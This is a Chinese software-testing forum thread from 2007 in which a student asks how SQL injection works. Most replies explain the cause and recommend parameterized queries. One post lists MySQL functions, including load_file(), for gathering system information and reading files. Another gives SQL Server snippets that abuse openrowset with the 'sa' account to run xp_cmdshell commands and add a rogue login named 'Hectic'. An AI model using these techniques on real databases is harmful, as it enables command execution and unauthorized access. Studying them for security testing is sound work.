51Testing软件测试论坛

 找回密码
 (注-册)加入51Testing

QQ登录

只需一步,快速开始

微信登录,快人一步

手机号码,快捷登录

查看: 9287|回复: 10
打印 上一主题 下一主题

[原创] SQL注入怎么注入

[复制链接]

该用户从未签到

跳转到指定楼层
1#
发表于 2007-4-8 13:37:52 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
哪个高手讲的简单易懂一点,老师给的视频看不懂
分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
收藏收藏
回复

使用道具 举报

该用户从未签到

2#
发表于 2007-4-24 10:51:01 | 只看该作者
什么视屏啊,共享看看:)
回复 支持 反对

使用道具 举报

该用户从未签到

3#
发表于 2007-4-24 10:57:01 | 只看该作者
sql注入的原理就是通过在客户端提交特殊代码获取服务器和程序的信息。
一般可以通过sql注入的网站都是由于程序员再写代码时没有对数据进行合法验证
回复 支持 反对

使用道具 举报

该用户从未签到

4#
发表于 2007-4-24 12:54:05 | 只看该作者
写sql语句的时候 尽量保证用参数传递
回复 支持 反对

使用道具 举报

该用户从未签到

5#
发表于 2007-8-1 22:32:43 | 只看该作者
这属于安全测试~!
我们知道,在SQL语句中,可以使用各种MySQL内置的函数,经常使用的就是DATABASE()、USER()、SYSTEM_USER()、SESSION_USER()、CURRENT_USER()这些函数来获取一些系统的信息,还有一个应用得比较多的函数,就是load_file(),该函数的作用是读入文件,并将文件内容作为一个字符串返回。
回复 支持 反对

使用道具 举报

该用户从未签到

6#
发表于 2007-8-2 00:50:40 | 只看该作者
举个例子吧:
  select * from openrowset('sqloledb','myserver';'sa';'','select * from table')
  可见(即使从字面意义上看)openrowset只是作为一个快捷的远程数据库访问,它必须跟在select后面,也就是说需要返回一个recordset 。
  那么我们能不能利用它调用xp_cmdshell呢?答案是肯定的!
  select * from openrowset('sqloledb','server';'sa';'','set fmtonly off
  exec master.dbo.xp_cmdshel l ''dir c:\''')
  必须加上set fmtonly off用来屏蔽默认的只返回列信息的设置,这样xp_cmdshell返回的output集合就会提交给前面的select显示,如果采用默认设置,会返回空集合导致select出错,命令也就无法执行了。
  那么如果我们要调用sp_addlogin呢,他不会像xp_cmdshell返回任何集合的,我们就不能再依靠fmtonly设置了,可以如下操作:
  select * from openrowset('sqloledb','server';'sa';'','select ''OK!''
  exec master.dbo.sp_addlogin Hectic')
  这样,命令至少会返回select OK!'的集合,你的机器商会显示OK!,同时对方的数据库内也会增加一个Hectic的账号,也就是说,我们利用select 'OK!'的返回集合欺骗了本地的select请求,是命令能够正常执行,通理sp_addsrvrolemember和opendatasource也可以如此操作!至于这个方法真正的用处,大家慢慢想吧。
回复 支持 反对

使用道具 举报

  • TA的每日心情
    奋斗
    2018-2-28 18:04
  • 签到天数: 40 天

    连续签到: 1 天

    [LV.5]测试团长

    7#
    发表于 2007-8-2 08:20:43 | 只看该作者
    讲起来好复杂的,SQL注入的方式很多,关键还是要开发注意编码方式和规范。避免可能出现注入的情况。
    楼主如果有兴趣,可以搜索google。好多的知识材料。
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    8#
    发表于 2007-8-2 09:12:44 | 只看该作者
    谢谢楼上的个位发言
    学习了 。。。。。
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    9#
    发表于 2009-10-31 17:24:21 | 只看该作者
    学习
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    10#
    发表于 2009-11-1 08:51:44 | 只看该作者

    SQL学习

    推荐个网站给大家是我辛苦整理的。
    http://www.lcroom.cn
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2021-6-9 14:08
  • 签到天数: 1 天

    连续签到: 1 天

    [LV.1]测试小兵

    11#
    发表于 2009-11-16 17:20:59 | 只看该作者
    这方面的资料太少了
    回复 支持 反对

    使用道具 举报

    本版积分规则

    关闭

    站长推荐上一条 /1 下一条

    小黑屋|手机版|Archiver|51Testing软件测试网 ( 沪ICP备05003035号 关于我们

    GMT+8, 2024-11-19 14:33 , Processed in 0.109063 second(s), 27 queries .

    Powered by Discuz! X3.2

    © 2001-2024 Comsenz Inc.

    快速回复 返回顶部 返回列表